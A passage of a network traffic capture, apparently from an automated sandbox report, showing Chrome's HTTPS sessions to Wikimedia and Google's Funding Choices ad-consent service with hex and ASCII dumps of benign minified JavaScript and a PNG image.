if(La())a=BigInt(a),E=Number(a&BigInt(4294967295))>>>0,F=Number(a>>BigInt(32)&BigInt(4294967295));else{var b=+(a[0]==="-");F=E=0;for(var c=a.length,e=b,d=(c-b)%6+b;
2024-10-31 18:19:29 UTC	1913	IN	Data Raw: 3d 62 5b 65 5d 2c 64 3d 21 28 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 64 29 3f 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 65 29 3a 64 3d 3d 3d 65 29 3b 69 66 28 64 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 66 75 6e 63 74 69 6f 6e 20 4f 62 28 61 29 7b 76 61 72 20 62 3b 69 66 28 61 26 26 28 62 3d 4d 29 21 3d 6e 75 6c 6c 26 26 62 2e 68 61 73 28 61 29 26 26 28 62 3d 61 2e 68 29 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 62 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 65 3d 62 5b 63 5d 3b 69 66 28 63 3d 3d 3d 62 2e 6c 65 6e 67 74 68 2d 31 26 26 6c 62 28 65 29 29 66 6f 72 28 76 61 72 20 64 20 69 6e 20 65 29 7b 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 64 29 29 Data Ascii: =b[e],d=!(Number.isNaN(d)?Number.isNaN(e):d===e);if(d)return!1}return!0}function Ob(a){var b;if(a&&(b=M)!=null&&b.has(a)&&(b=a.h))for(var c=0;c<b.length;c++){var e=b[c];if(c===b.length-1&&lb(e))for(var d in e){if(Object.prototype.hasOwnProperty.call(e,d))
2024-10-31 18:19:29 UTC	1913	IN	Data Raw: 64 3d 6b 3d 30 3b 6b 3c 61 2e 6c 65 6e 67 74 68 2d 32 3b 6b 2b 3d 33 29 7b 76 61 72 20 67 3d 61 5b 6b 5d 2c 68 3d 61 5b 6b 2b 31 5d 3b 66 3d 61 5b 6b 2b 32 5d 3b 6d 3d 62 5b 67 3e 3e 32 5d 3b 67 3d 62 5b 28 67 26 33 29 3c 3c 34 7c 68 3e 3e 34 5d 3b 68 3d 62 5b 28 68 26 31 35 29 3c 3c 32 7c 66 3e 3e 36 5d 3b 66 3d 62 5b 66 26 36 33 5d 3b 63 5b 64 2b 2b 5d 3d 6d 2b 67 2b 68 2b 66 7d 6d 3d 30 3b 66 3d 65 3b 73 77 69 74 63 68 28 61 2e 6c 65 6e 67 74 68 2d 6b 29 7b 63 61 73 65 20 32 3a 6d 3d 61 5b 6b 2b 31 5d 2c 66 3d 62 5b 28 6d 26 31 35 29 3c 3c 32 5d 7c 7c 65 3b 63 61 73 65 20 31 3a 61 3d 61 5b 6b 5d 2c 63 5b 64 5d 3d 62 5b 61 3e 3e 32 5d 2b 62 5b 28 61 26 33 29 3c 3c 34 7c 6d 3e 3e 34 5d 2b 66 2b 65 7d 61 3d 63 2e 6a 6f 69 6e 28 22 22 29 7d 72 65 74 75 72 Data Ascii: d=k=0;k<a.length-2;k+=3){var g=a[k],h=a[k+1];f=a[k+2];m=b[g>>2];g=b[(g&3)<<4\|h>>4];h=b[(h&15)<<2\|f>>6];f=b[f&63];c[d++]=m+g+h+f}m=0;f=e;switch(a.length-k){case 2:m=a[k+1],f=b[(m&15)<<2]\|\|e;case 1:a=a[k],c[d]=b[a>>2]+b[(a&3)<<4\|m>>4]+f+e}a=c.join("")}retur

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49810	185.15.59.240	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:29 UTC	431	OUT	GET /wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png HTTP/1.1 Host: upload.wikimedia.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:29 UTC	1068	IN	HTTP/1.1 200 OK date: Thu, 31 Oct 2024 11:48:50 GMT etag: e78b7bd4e07bfd2389ecb0c9baf2d9c4 server: ATS/9.2.5 content-type: image/png content-disposition: inline;filename=UTF-8''Microsoft_.NET_logo.svg.png last-modified: Thu, 11 Jul 2024 08:02:42 GMT content-length: 6633 age: 23438 x-cache: cp3077 hit, cp3077 hit/51 x-cache-status: hit-front server-timing: cache;desc="hit-front", host;desc="cp3077" strict-transport-security: max-age=106384710; includeSubDomains; preload report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] } nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0} x-client-ip: 173.254.250.77 x-content-type-options: nosniff access-control-allow-origin: access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache timing-allow-origin: * accept-ranges: bytes connection: close
2024-10-31 18:19:29 UTC	6633	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 03 00 00 00 dc ff 43 fd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 df 50 4c 54 45 51 2b d4 e8 e4 f9 ff ff ff fe fd ff 78 5a de a8 95 ea 5d 3a d7 63 41 d8 d1 c6 f4 8c 72 e2 e0 d9 f7 54 2f d5 a0 8b e8 f8 f7 fd 68 47 da ce c3 f3 ef eb fb 5d 39 d7 b8 a9 ed 79 5c de e1 da f8 a4 90 e8 f9 f8 fd 69 48 da d3 c9 f4 52 2c d4 8f 77 e3 f1 ee fc 5f 3c d7 bb ad ee fe fe ff 7e 62 df e5 df f9 56 32 d5 a7 94 e9 fa f9 fe 6d 4d db d4 cb f4 93 7b e4 f2 ef fc 60 3d d8 bf b1 ef 7f 64 df e6 e0 f9 aa 98 ea fb fa fe 6e 4e db d6 cd f5 96 7f e5 f5 f3 fc c2 b5 f0 84 Data Ascii: PNGIHDRCgAMAa cHRMz&u0`:pQ<PLTEQ+xZ]:cArT/hG]9y\iHR,w_<~bV2mM{`=dnN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49816	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:32 UTC	878	OUT	GET /f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_ HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:32 UTC	1913	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:32 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-EUwpyqbBQ98v7SgVbAEIbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmJw05BikPj6kkkLiJ3SZ7CGAHHrzXOs04E46d951hIgdte6yOoPxIYKl1idgdix6BKrJxCr9lxiNQfi--susT4H4iKJK6wtQHy76QrrYyBm-HqFlQOIhXg4tkzp38kmMOH79_VMShpJ-YXxyfl5JUWZSaUl-UVpyWmpxalFZalF8UYGRiaGBsYGegYG8QUGAIkOQBE" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:32 UTC	60	IN	Data Raw: 33 36 0d 0a 77 69 6e 64 6f 77 5b 27 61 63 37 65 36 30 35 39 2d 31 34 32 35 2d 34 63 34 61 2d 39 30 32 33 2d 61 38 36 61 65 32 38 36 39 37 37 61 27 5d 20 3d 20 74 72 75 65 3b 0d 0a Data Ascii: 36window['ac7e6059-1425-4c4a-9023-a86ae286977a'] = true;
2024-10-31 18:19:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49815	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:32 UTC	845	OUT	POST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive Content-Length: 155 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:32 UTC	155	OUT	Data Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 36 39 35 33 34 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 31 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d Data Ascii: [null,null,null,null,null,null,null,null,1730398769534,null,null,[[1,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
2024-10-31 18:19:32 UTC	1862	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: https://trksyln.net Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:32 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-UBpud_m9l6W1eNetb35txA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmLw0JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4uHYMqV_J5vAhMvfNzMpuSTlF8Yn5-eVpOaV6CamFOuC2EWZSaUl-UUo7NQykIqc_PT0zLz0eCMDIxNDA2MDPQPj-AIDADFFKMs" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49818	142.250.186.174	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:32 UTC	826	OUT	GET /f/AGSKWxV0ZPylImy9Jv559Xp-MfnxImaXclZ9OIKioUncC-GjReRDOsqaZURJYln7HbKIHyw60n2CPZC7wftExCVvpG55gIUpCQASPLV6D5xkeZKDyuznFxUsEyU7ddDqW8yK_JFWTVcJHA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzY3LDE4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:32 UTC	1937	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:32 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-4U3cJ6ADriiwF2duhUDSqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: cross-origin reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw15BikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhXg4tkzp38kmMGPJ6hNMShpJ-YXxyfl5JUWZSaUl-UVpyWmpxalFZalF8UYGRiaGBsYGegYG8QUGAGs4P4A" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:32 UTC	1937	IN	Data Raw: 32 38 31 37 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 54 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 5f 2e 73 Data Ascii: 2817if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{var To=function(a){if(!a)return null;a=_.s
2024-10-31 18:19:32 UTC	1937	IN	Data Raw: 6c 3f 5f 2e 4b 28 61 2c 32 29 3a 6e 75 6c 6c 29 26 26 0a 61 3d 3d 3d 31 26 26 5f 2e 46 6e 28 63 2c 31 30 2c 21 30 29 3b 62 28 63 29 7d 3b 76 61 72 20 6a 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 3d 5b 5d 7d 3b 6a 70 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 69 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 63 61 6c 6c 2e 61 70 70 6c 79 28 61 2c 5b 62 5d 2e 63 6f 6e 63 61 74 28 5f 2e 68 61 28 5f 2e 47 63 2e 61 70 70 6c 79 28 30 2c 61 72 67 75 6d 65 6e 74 73 29 29 29 29 7d 29 7d 3b 6a 70 2e 70 72 6f 74 6f 74 79 70 65 2e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 5f 2e 47 63 2e 61 70 70 6c 79 28 30 2c 61 72 67 Data Ascii: l?_.K(a,2):null)&&a===1&&_.Fn(c,10,!0);b(c)};var jp=function(){this.i=[]};jp.prototype.addEventListener=function(a,b){this.i.push(function(){a.call.apply(a,[b].concat(_.ha(_.Gc.apply(0,arguments))))})};jp.prototype.g=function(){for(var a=_.Gc.apply(0,arg
2024-10-31 18:19:32 UTC	1937	IN	Data Raw: 61 2c 31 29 3b 57 6f 28 62 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 70 28 61 2c 30 29 3b 57 6f 28 62 29 7d 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 70 28 61 2c 32 29 7d 29 7d 3b 0a 76 61 72 20 4a 70 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 62 2e 63 6c 61 73 73 4e 61 6d 65 3d 61 2e 6f 3b 62 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 70 78 22 3b 62 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 70 78 22 3b 62 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 3b 62 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 2d 31 30 30 30 30 70 78 22 3b 62 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 22 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 39 Data Ascii: a,1);Wo(b)},function(){np(a,0);Wo(b)})},function(){np(a,2)})};var Jp=function(a){var b=document.createElement("div");b.className=a.o;b.style.width="1px";b.style.height="1px";b.style.position="absolute";b.style.left="-10000px";b.style.top="-"+Math.floor(9
2024-10-31 18:19:32 UTC	1937	IN	Data Raw: 74 68 69 73 2c 61 29 29 7d 3b 76 61 72 20 65 71 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 6e 65 77 20 69 70 28 61 2e 44 2c 61 2e 41 2c 61 2e 43 2c 61 2e 42 29 3b 73 70 28 61 2e 75 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 2e 73 74 61 72 74 28 65 2c 62 29 7d 29 3b 76 61 72 20 64 3d 63 71 28 61 29 3b 72 70 28 61 2e 75 2c 64 2e 65 63 29 3b 64 2e 48 63 28 29 7d 3b 76 61 72 20 66 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 66 71 2c 5f 2e 49 29 3b 76 61 72 20 67 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 67 71 2c 5f 2e 49 29 3b 76 61 72 20 68 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f Data Ascii: this,a))};var eq=function(a,b){var c=new ip(a.D,a.A,a.C,a.B);sp(a.u,function(e){c.start(e,b)});var d=cq(a);rp(a.u,d.ec);d.Hc()};var fq=function(a){this.l=_.t(a)};_.v(fq,_.I);var gq=function(a){this.l=_.t(a)};_.v(gq,_.I);var hq=function(a){this.l=_.t(a)};_
2024-10-31 18:19:32 UTC	1937	IN	Data Raw: 30 6c 75 51 57 52 7a 49 45 4a 30 62 55 46 6b 49 47 46 6b 4d 7a 41 77 58 33 5a 6c 63 6a 49 67 64 48 64 70 64 48 52 6c 63 69 31 68 5a 43 42 74 62 32 51 74 59 57 52 69 62 47 39 6a 61 79 49 73 57 32 35 31 62 47 77 73 62 6e 56 73 62 43 78 75 64 57 78 73 4c 43 4a 6f 64 48 52 77 63 7a 6f 76 4c 33 42 68 5a 32 56 68 5a 44 49 75 5a 32 39 76 5a 32 78 6c 63 33 6c 75 5a 47 6c 6a 59 58 52 70 62 32 34 75 59 32 39 74 4c 33 42 68 5a 32 56 68 5a 43 39 76 63 32 51 75 61 6e 4d 5c 2f 5a 6d 4e 6b 58 48 55 77 4d 44 4e 6b 64 48 4a 31 5a 53 4a 64 4c 46 74 75 64 57 78 73 4c 47 35 31 62 47 77 73 49 6d 68 30 64 48 42 7a 4f 69 38 76 63 47 46 6e 5a 57 46 6b 4d 69 35 6e 62 32 39 6e 62 47 56 7a 65 57 35 6b 61 57 4e 68 64 47 6c 76 62 69 35 6a 62 32 30 76 5a 6d 46 32 61 57 4e 76 62 69 35 Data Ascii: 0luQWRzIEJ0bUFkIGFkMzAwX3ZlcjIgdHdpdHRlci1hZCBtb2QtYWRibG9jayIsW251bGwsbnVsbCxudWxsLCJodHRwczovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9vc2QuanM\/ZmNkXHUwMDNkdHJ1ZSJdLFtudWxsLG51bGwsImh0dHBzOi8vcGFnZWFkMi5nb29nbGVzeW5kaWNhdGlvbi5jb20vZmF2aWNvbi5
2024-10-31 18:19:32 UTC	586	IN	Data Raw: 32 78 6c 4c 6d 4e 76 62 53 39 66 4c 30 4e 76 62 6e 52 79 61 57 4a 31 64 47 39 79 55 32 56 79 64 6d 6c 75 5a 31 64 6c 59 6c 4e 33 61 58 52 6a 61 47 4a 76 59 58 4a 6b 53 48 52 30 63 43 39 71 63 32 56 79 63 6d 39 79 49 6c 31 64 58 51 5c 5c 75 30 30 33 64 5c 5c 75 30 30 33 64 5c 78 32 32 5c 78 35 64 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 58 30 31 54 57 76 6d 73 50 39 47 53 76 53 30 58 59 74 73 75 46 4d 4f 48 74 69 44 78 63 34 73 72 52 67 32 61 36 78 64 4c 50 59 48 6b 39 72 31 4e 74 46 65 4b 30 51 56 59 43 2d 39 58 2d 73 4f 4a 6c 4f 68 78 2d 67 30 74 4a 67 Data Ascii: 2xlLmNvbS9fL0NvbnRyaWJ1dG9yU2VydmluZ1dlYlN3aXRjaGJvYXJkSHR0cC9qc2Vycm9yIl1dXQ\\u003d\\u003d\x22\x5d\x5d,\x5bnull,null,null,\x22https:\/\/fundingchoicesmessages.google.com\/f\/AGSKWxX01TWvmsP9GSvS0XYtsuFMOHtiDxc4srRg2a6xdLPYHk9r1NtFeK0QVYC-9X-sOJlOhx-g0tJg
2024-10-31 18:19:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49832	172.217.18.4	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
